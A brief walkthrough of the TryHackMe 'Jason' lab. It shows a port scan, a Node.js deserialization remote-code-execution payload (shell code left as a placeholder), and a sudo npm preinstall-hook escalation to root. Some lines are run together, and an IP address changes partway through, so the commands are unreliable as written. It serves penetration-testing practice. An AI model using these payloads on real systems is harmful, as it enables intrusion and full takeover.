TryHackMe Jason
We are Horror LLC TryHackMe Jason, we specialize in horror, but one of the scarier aspects of our company is our front-end webserver. We can’t launch our site in its current state and our level of concern regarding our cybersecurity is growing exponentially. We ask that you perform a thorough penetration test and try to compromise the root account. There are no rules for this engagement. Good luck!
In JavaScript everything is a terrible mistake.
Thanks to @Luma for testing the room.
Scan the machine
rustscan -a 10.10.44.51
Investigate Web server
firefox http://10.10.44.51
Analise Source Code
Investigate Requests
10.10.82.11Get a reverse Shell
{"rce":"_$$ND_FUNC$$_function (){ 'nodejsshell_code' }()"}
Get User Flag
cat /home/dylan/user.txt
Escalate Privileges
Search for npm on GTFO Bins and we have
export TERM=xtermTF=$(mktemp -d)echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.jsonsudo npm -C $TF --unsafe-perm i
Get Root Flag
cat /root/root.txt
